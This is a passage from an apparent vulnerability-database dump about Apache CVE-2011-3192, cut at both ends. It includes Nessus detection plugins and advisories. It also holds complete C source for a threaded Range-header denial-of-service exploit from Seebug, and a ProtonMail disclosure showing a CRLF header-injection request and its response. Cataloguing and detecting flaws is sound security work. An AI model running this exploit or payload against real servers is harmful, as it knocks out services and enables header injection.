that fix one security issue are now available for Red Hat Enterprise Linux 4, 5, and 6.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nA flaw was found in the way the Apache HTTP Server handled Range HTTP headers. A remote attacker could use this flaw to cause httpd to use an excessive amount of memory and CPU time via HTTP requests with a specially crafted Range header. (CVE-2011-3192)\n\nAll httpd users should upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "modified": "2018-07-18T00:00:00", "id": "ORACLELINUX_ELSA-2011-1245.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=68342", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 / 5 / 6 : httpd (ELSA-2011-1245)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2011:1245 and \n# Oracle Linux Security Advisory ELSA-2011-1245 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68342);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/07/18 17:43:56\");\n\n script_cve_id(\"CVE-2011-3192\");\n script_bugtraq_id(49303);\n script_xref(name:\"RHSA\", value:\"2011:1245\");\n\n script_name(english:\"Oracle Linux 4 / 5 / 6 : httpd (ELSA-2011-1245)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2011:1245 :\n\nUpdated httpd packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 4, 5, and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nA flaw was found in the way the Apache HTTP Server handled Range HTTP\nheaders. A remote attacker could use this flaw to cause httpd to use\nan excessive amount of memory and CPU time via HTTP requests with a\nspecially crafted Range header. (CVE-2011-3192)\n\nAll httpd users should upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-September/002324.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-September/002327.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-September/002330.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(4|5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4 / 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"httpd-2.0.52-48.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"httpd-devel-2.0.52-48.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"httpd-manual-2.0.52-48.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"httpd-suexec-2.0.52-48.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"mod_ssl-2.0.52-48.ent.0.1\")) flag++;\n\nif (rpm_check(release:\"EL5\", reference:\"httpd-2.2.3-53.0.1.el5_7.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-devel-2.2.3-53.0.1.el5_7.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-manual-2.2.3-53.0.1.el5_7.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mod_ssl-2.2.3-53.0.1.el5_7.1\")) flag++;\n\nif (rpm_check(release:\"EL6\", reference:\"httpd-2.2.15-9.0.1.el6_1.2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-devel-2.2.15-9.0.1.el6_1.2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-manual-2.2.15-9.0.1.el6_1.2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-tools-2.2.15-9.0.1.el6_1.2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mod_ssl-2.2.15-9.0.1.el6_1.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-suexec / httpd-tools / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:18:18", "bulletinFamily": "scanner", "description": "Updated httpd packages that fix one security issue are now available for Red Hat Enterprise Linux 5.3 Long Life, 5.6 Extended Update Support, and 6.0 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nA flaw was found in the way the Apache HTTP Server handled Range HTTP headers. A remote attacker could use this flaw to cause httpd to use an excessive amount of memory and CPU time via HTTP requests with a specially crafted Range header. (CVE-2011-3192)\n\nAll httpd users should upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "modified": "2017-01-10T00:00:00", "id": "REDHAT-RHSA-2011-1294.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=63998", "published": "2013-01-24T00:00:00", "title": "RHEL 5 / 6 : httpd (RHSA-2011:1294)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:1294. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63998);\n script_version(\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2017/01/10 18:05:23 $\");\n\n script_cve_id(\"CVE-2011-3192\");\n script_bugtraq_id(49303);\n script_xref(name:\"RHSA\", value:\"2011:1294\");\n\n script_name(english:\"RHEL 5 / 6 : httpd (RHSA-2011:1294)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.3 Long Life, 5.6 Extended Update\nSupport, and 6.0 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nA flaw was found in the way the Apache HTTP Server handled Range HTTP\nheaders. A remote attacker could use this flaw to cause httpd to use\nan excessive amount of memory and CPU time via HTTP requests with a\nspecially crafted Range header. (CVE-2011-3192)\n\nAll httpd users should upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-3192.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2011-1294.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2017 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"httpd-2.2.3-22.el5_3.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"httpd-2.2.3-22.el5_3.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"httpd-devel-2.2.3-22.el5_3.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"httpd-devel-2.2.3-22.el5_3.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"httpd-manual-2.2.3-22.el5_3.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"httpd-manual-2.2.3-22.el5_3.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"mod_ssl-2.2.3-22.el5_3.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.3-22.el5_3.3\")) flag++;\n\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"httpd-2.2.3-45.el5_6.2\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"httpd-2.2.3-45.el5_6.2\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"httpd-2.2.3-45.el5_6.2\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", reference:\"httpd-devel-2.2.3-45.el5_6.2\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"httpd-manual-2.2.3-45.el5_6.2\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"httpd-manual-2.2.3-45.el5_6.2\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"httpd-manual-2.2.3-45.el5_6.2\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"mod_ssl-2.2.3-45.el5_6.2\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"mod_ssl-2.2.3-45.el5_6.2\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.3-45.el5_6.2\")) flag++;\n\nif (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"httpd-2.2.15-5.el6_0.1\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"httpd-2.2.15-5.el6_0.1\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-2.2.15-5.el6_0.1\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"httpd-debuginfo-2.2.15-5.el6_0.1\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"httpd-devel-2.2.15-5.el6_0.1\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"httpd-manual-2.2.15-5.el6_0.1\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"httpd-tools-2.2.15-5.el6_0.1\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"httpd-tools-2.2.15-5.el6_0.1\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-tools-2.2.15-5.el6_0.1\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"mod_ssl-2.2.15-5.el6_0.1\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"mod_ssl-2.2.15-5.el6_0.1\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.15-5.el6_0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "amazon": [{"lastseen": "2018-10-02T16:55:18", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nThe Apache HTTP Server is a popular web server.\n\nA flaw was found in the way the Apache HTTP Server handled Range HTTP headers. A remote attacker could use this flaw to cause httpd to use an excessive amount of memory and CPU time via HTTP requests with a specially-crafted Range header. ([CVE-2011-3192 __](<https://access.redhat.com/security/cve/CVE-2011-3192>))\n\nAll httpd users should upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.\n\n \n**Affected Packages:** \n\n\nhttpd\n\n \n**Issue Correction:** \nRun _yum update httpd_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n httpd-devel-2.2.21-1.18.amzn1.i686 \n httpd-debuginfo-2.2.21-1.18.amzn1.i686 \n httpd-2.2.21-1.18.amzn1.i686 \n httpd-tools-2.2.21-1.18.amzn1.i686 \n mod_ssl-2.2.21-1.18.amzn1.i686 \n \n noarch: \n httpd-manual-2.2.21-1.18.amzn1.noarch \n \n src: \n httpd-2.2.21-1.18.amzn1.src \n \n x86_64: \n mod_ssl-2.2.21-1.18.amzn1.x86_64 \n httpd-tools-2.2.21-1.18.amzn1.x86_64 \n httpd-2.2.21-1.18.amzn1.x86_64 \n httpd-devel-2.2.21-1.18.amzn1.x86_64 \n httpd-debuginfo-2.2.21-1.18.amzn1.x86_64 \n \n \n", "modified": "2014-09-14T14:25:00", "published": "2014-09-14T14:25:00", "id": "ALAS-2011-001", "href": "https://alas.aws.amazon.com/ALAS-2011-1.html", "title": "Medium: httpd", "type": "amazon", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T16:45:16", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-72403", "id": "SSV:72403", "title": "Apache HTTP Server Denial of Service", "type": "seebug", "sourceData": "\n /*\r\n * This is a reverse engineered version of the exploit for CVE-2011-3192 made\r\n * by ev1lut10n (http://jayakonstruksi.com/backupintsec/rapache.tgz).\r\n * Copyright 2011 Ramon de C Valle <rcvalle@redhat.com>\r\n *\r\n * Compile with the following command:\r\n * gcc -Wall -pthread -o rcvalle-rapache rcvalle-rapache.c\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/ptrace.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netdb.h>\r\n#include <unistd.h>\r\n#include <pthread.h>\r\n\r\nvoid ptrace_trap(void) __attribute__ ((constructor));\r\n\r\nvoid\r\nptrace_trap(void) {\r\n if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) {\r\n write(fileno(stdout), "Segmentation fault\\n", 19);\r\n exit(-1);\r\n }\r\n}\r\n\r\nvoid\r\nw4rn41dun14mu(int attr, int fg, int bg)\r\n{\r\n char command[13];\r\n\r\n sprintf(command, "%c[%d;%d;%dm", 0x1b, attr, fg+30, bg+40);\r\n printf("%s", command);\r\n}\r\n\r\nvoid\r\nbanner()\r\n{\r\n w4rn41dun14mu(0, 1, 0);\r\n fwrite("Remote Apache Denial of Service Exploit by ev1lut10n\\n", 53, 1,\r\n stdout);\r\n}\r\n\r\nvoid\r\ngime_er_mas()\r\n{\r\n printf("%c%s", 0x1b, "[2J");\r\n printf("%c%s", 0x1b, "[1;1H");\r\n puts("\\nsorry dude there's an error...");\r\n}\r\n\r\nstruct thread_info {\r\n pthread_t thread_id;\r\n int thread_num;\r\n char *argv_string;\r\n};\r\n\r\nstatic void *\r\nthread_start(void *arg)\r\n{\r\n struct thread_info *tinfo = (struct thread_info *) arg;\r\n char hostname[64];\r\n int j;\r\n\r\n strcpy(hostname, tinfo->argv_string);\r\n\r\n j = 0;\r\n while (j != 10) {\r\n struct addrinfo hints;\r\n struct addrinfo *result, *rp;\r\n int sfd, s;\r\n ssize_t nwritten;\r\n\r\n memset(&hints, 0, sizeof(struct addrinfo));\r\n hints.ai_family = AF_UNSPEC;\r\n hints.ai_socktype = SOCK_STREAM;\r\n hints.ai_flags = 0;\r\n hints.ai_protocol = 0;\r\n\r\n s = getaddrinfo(hostname, "http", &hints, &result);\r\n if (s != 0) {\r\n fprintf(stderr, "getaddrinfo: %s\\n", gai_strerror(s));\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n for (rp = result; rp != NULL; rp = rp->ai_next) {\r\n sfd = socket(rp->ai_family, rp->ai_socktype, rp->ai_protocol);\r\n if (sfd == -1)\r\n continue;\r\n\r\n if (connect(sfd, rp->ai_addr, rp->ai_addrlen) == -1)\r\n close(sfd);\r\n }\r\n\r\n if (result != NULL)\r\n freeaddrinfo(result);\r\n\r\n nwritten = write(sfd, "HEAD / HTTP/1.1\\n"\r\n "Host:localhost\\n"\r\n "Range:bytes=0-,0-\\n"\r\n "Accept-Encoding: gzip", 71);\r\n if (nwritten == -1)\r\n close(sfd);\r\n\r\n usleep(300000);\r\n\r\n j++;\r\n }\r\n\r\n return 0;\r\n}\r\n\r\nint\r\nmain(int argc, char *argv[])\r\n{\r\n int i;\r\n struct thread_info tinfo;\r\n\r\n banner();\r\n\r\n if (argc <= 1) {\r\n w4rn41dun14mu(0, 2, 0);\r\n fwrite("\\n[-] Usage : ./rapache hostname\\n", 32, 1, stdout);\r\n return 0;\r\n }\r\n\r\n w4rn41dun14mu(0, 3, 0);\r\n printf("[+] Attacking %s please wait in minutes ...\\n", argv[1]);\r\n\r\n while (1) {\r\n i = 0;\r\n while (i != 50) {\r\n tinfo.thread_num = i;\r\n tinfo.argv_string = argv[1];\r\n\r\n pthread_create(&tinfo.thread_id, NULL, &thread_start, &tinfo);\r\n\r\n usleep(500000);\r\n\r\n i++;\r\n }\r\n }\r\n}\r\n\n ", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-72403"}], "packetstorm": [{"lastseen": "2016-12-05T22:22:46", "bulletinFamily": "exploit", "description": "", "modified": "2014-05-30T00:00:00", "published": "2014-05-30T00:00:00", "href": "https://packetstormsecurity.com/files/126851/ProtonMail.ch-Header-Injection-CSRF.html", "id": "PACKETSTORM:126851", "type": "packetstorm", "title": "ProtonMail.ch Header Injection / CSRF", "sourceData": "`SecurityAdvisory \n---------------- \n \n \nTime Line Vulnerability \n------------------------------- \n \n \n-Day 05-05-2014 Security Advisory => No response \n \n \n-Days 08 12 19-05-2014 Multiples Advisories => No Response \n \n \n-Day 20-05-2014 Full Disclosure \n \n \n \nAlerts summary \n******************** \n \n \n-CRLF injection/HTTP response splitting \n \n/crypt/cryptographp.php \ncfg \n \n \n-Apache 2.x version older than 2.2.6 \nWeb Server \n \n \n-Apache 2.x version older than 2.2.8 \nWeb Server \n \n \n-Apache 2.x version older than 2.2.9 \nWeb Server \n \n \n-Apache httpd remote denial of service \nWeb Server \n \n \n-HTML form without CSRF protection \n \n/blog \n/blog/transparency-report \n/blog/wp-login.php \n/blog/wp-login.php (cac6435f6386a7a635b3f12aeb81195e) \n/crypt \n/lander \n/login.php \n/report_bug.php \n/sign_up.php \n \n \n \n-Apache 2.x version older than 2.2.10 \n \nWeb Server \n \n \n-Clickjacking: X-Frame-Options header missing \n \nWeb Server \n \n \n-Sensitive page could be cached \n \n/sign_up.php (a18aae949b9855b60506dc83164afe7f) \n \n \n \n-Session Cookie without HttpOnly flag set \n/ \n \n \n \n-TRACE method is enabled \n \nWeb Server \n \n \n \n-Broken links \n \n/css/bootstrap.css \n/css/bs.css \n/pages/contact_us.php \n/pages/mit_license.php \nPassword type input with autocomplete enabled \n/blog/wp-login.php \n \n \n \n \nI. VULNERABILITY \n------------------------- \n \n \nThe ASAP-Sec Penetration Testers just explain faults exposed in the title \n \n \n#Title: ProtonMail.ch suffers from a CRLF injection-HTTP response \nsplitting / Apache 2.x version older than 2.2.6 -X.8 -X.9.- 2.2.10 / \nhttpd RemoteDoS / CSRF \n \n \n#Vendor:https://protonmail.ch:443/ \n \n \n#Author:Juan Carlos Garc\u00eda and Francisco Moraga \n \n \n#Follow us : http://www.highsec.es ||| Twitter:@secnight / @btshell1 \n \n \n \n \n \nII. DESCRIPTION \n------------------------- \n \n \n-ProtonMail is incorporated in Switzerland and their servers are located \nin Switzerland. \n \n \n-They are outside of US and EU jurisdiction and all user data is \nprotected by strict Swiss privacy laws. \n \nBecause of our end-to-end encryption, They think that : \n \n\"Your data is already secure and encrypted by the time it reaches our \nservers. We have no access to your messages, and since we cannot decrypt \nthem, we cannot share them with third parties\". \n \n \n-ProtonMail's segregated authentication and decryption system means \nlogging into a ProtonMail account that requires two passwords. \n \n \n-The first password is used to authenticate the user and retrieve the \ncorrect account. After that, encrypted data is sent to the user. \n \n \n-The second password is a decryption password which is never sent to us. \nIt is used to decrypt the user\u0092s data in the browser so we never have \naccess to the decrypted data \n \nor the decryption password. \n \n \n-For this reason, we are also unable to do password recovery. \n \n \n-If you forget your decryption password, we cannot recover your data. \n \n \n \n \nBy theWay, ASAP-SEC are Verifiying this information... Let's go to the \nbusiness ;) \n \n \n \n \n \nIII- Vulnerabilities \n--------------------- \n \n \nCRLF injection / HTTP response splitting \n**************************************** \n \n \nThis script is possibly vulnerable to CRLF injection attacks. \n \nHTTP headers have the structure \"Key: \n \nValue\", where each line is separated by the CRLF combination. \n \nIf the user input is injected into the value section without properly \nescaping/removing \n \nCRLF characters it is possible to alter the HTTP headers structure. \n \nHTTP Response Splitting is a \"new\" application attack technique which \nenables \n \nvarious new attacks such as web cache poisoning,cross user defacement, \n \nhijacking pages with sensitive user information and cross-site scripting \n(XSS). \n \n \nThe attacker sends a single HTTP request that forces the web server to \nform an output stream, \n \nwhich is then interpreted by the target as two HTTP responses instead of \none response. \n \n \nAffected items \n------------------ \n \n/crypt/cryptographp.php \n \n \n \nThe impact of this vulnerability \n---------------------------------- \n \nIs it possible for a remote attacker to inject custom HTTP headers. \n \nFor example, an attacker can inject session cookies or HTML code. \n \nThis may conduct to vulnerabilities like XSS (cross-site scripting) or \nsession fixation. \n \n \n \n \nHow to fix this vulnerability \n------------------------------------ \n \n \nYou need to restrict CR(0x13) and LF(0x10) \n \n \nFrom \n \nthe user input \n \nor \n \nproperly encode the output \n \nin \n \norder to prevent the injection \n \nof \n \ncustom HTTP headers. \n \n \n \n \nAttack details \n-------------------- \n \nURL encoded GET input cfg was set to \n<SomeCustomInjectedHeader:injected_by_secnight \n \n \n \nInjected header found: \n \nSomeCustomInjectedHeader: injected_by_secnight \n \n \n \nGET \n/crypt/cryptographp.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight \n \n \n \n \n \nHTTP/1.0 302 Found \n \nDate: Wed, 28 May 2014 15:33:55 GMT \n \nServer: Apache/2.2.3 (CentOS) \n \nX-Powered-By: PHP/5.3.28 \n \nExpires: Thu, 19 Nov 1981 08:52:00 GMT \n \nCache-Control: no-store, no-cache, must-revalidate, post-check=0, \npre-check=0 \n \nPragma: no-cache \n \nSet-Cookie: cryptcookietest=1 \n \nLocation: cryptographp.inc.php?cfg= \n \nSomeCustomInjectedHeader: injected_by_secnight&sn=PHPSESSID& \n \nStrict-Transport-Security: max-age=15768000;includeSubDomains \n \nContent-Length: 